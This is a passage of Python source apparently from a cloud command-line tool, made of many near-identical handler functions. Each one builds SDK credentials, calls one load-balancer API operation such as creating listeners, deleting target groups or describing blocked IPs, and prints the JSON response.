models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeBlockIPTaskRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeBlockIPTask(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateListener(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateListenerRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateListener(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteLoadBalancerSnatIps(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteLoadBalancerSnatIpsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteLoadBalancerSnatIps(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteListener(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteListenerRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteListener(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doSetSecurityGroupForLoadbalancers(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.SetSecurityGroupForLoadbalancersRequest()
model.from_json_string(json.dumps(args))
rsp = client.SetSecurityGroupForLoadbalancers(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doBatchDeregisterTargets(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.BatchDeregisterTargetsRequest()
model.from_json_string(json.dumps(args))
rsp = client.BatchDeregisterTargets(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doRegisterTargetGroupInstances(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.RegisterTargetGroupInstancesRequest()
model.from_json_string(json.dumps(args))
rsp = client.RegisterTargetGroupInstances(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateRule(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateRuleRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateRule(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doAutoRewrite(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.AutoRewriteRequest()
model.from_json_string(json.dumps(args))
rsp = client.AutoRewrite(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeLoadBalancerTraffic(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeLoadBalancerTrafficRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeLoadBalancerTraffic(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyDomain(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyDomainRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyDomain(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteLoadBalancerListeners(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteLoadBalancerListenersRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteLoadBalancerListeners(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteTargetGroups(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteTargetGroupsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteTargetGroups(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeregisterTargetsFromClassicalLB(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeregisterTargetsFromClassicalLBRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeregisterTargetsFromClassicalLB(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateLoadBalancer(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateLoadBalancerRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateLoadBalancer(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeLoadBalancerListByCertId(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeLoadBalancerListByCertIdRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeLoadBalancerListByCertId(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyListener(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyListenerRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyListener(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteLoadBalancer(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteLoadBalancerRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteLoadBalancer(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyDomainAttributes(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyDomainAttributesRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyDomainAttributes(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDisassociateTargetGroups(args, parsed_globals):
    """Call the CLB DisassociateTargetGroups API and print its JSON response.

    args: dict of request parameters, serialized into a DisassociateTargetGroupsRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DisassociateTargetGroupsRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DisassociateTargetGroups(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteRewrite(args, parsed_globals):
    """Call the CLB DeleteRewrite API and print its JSON response.

    args: dict of request parameters, serialized into a DeleteRewriteRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DeleteRewriteRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DeleteRewrite(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTargetGroupInstances(args, parsed_globals):
    """Call the CLB DescribeTargetGroupInstances API and print its JSON response.

    args: dict of request parameters, serialized into a DescribeTargetGroupInstancesRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeTargetGroupInstancesRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeTargetGroupInstances(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doAssociateTargetGroups(args, parsed_globals):
    """Call the CLB AssociateTargetGroups API and print its JSON response.

    args: dict of request parameters, serialized into an AssociateTargetGroupsRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.AssociateTargetGroupsRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.AssociateTargetGroups(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeLoadBalancersDetail(args, parsed_globals):
    """Call the CLB DescribeLoadBalancersDetail API and print its JSON response.

    args: dict of request parameters, serialized into a DescribeLoadBalancersDetailRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeLoadBalancersDetailRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeLoadBalancersDetail(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeregisterTargetGroupInstances(args, parsed_globals):
    """Call the CLB DeregisterTargetGroupInstances API and print its JSON response.

    args: dict of request parameters, serialized into a DeregisterTargetGroupInstancesRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DeregisterTargetGroupInstancesRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DeregisterTargetGroupInstances(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeLoadBalancers(args, parsed_globals):
    """Call the CLB DescribeLoadBalancers API and print its JSON response.

    args: dict of request parameters, serialized into a DescribeLoadBalancersRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DescribeLoadBalancersRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DescribeLoadBalancers(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeBlockIPList(args, parsed_globals):
    """Call the CLB DescribeBlockIPList API and print its JSON response.

    args: dict of request parameters, serialized into a DescribeBlockIPListRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
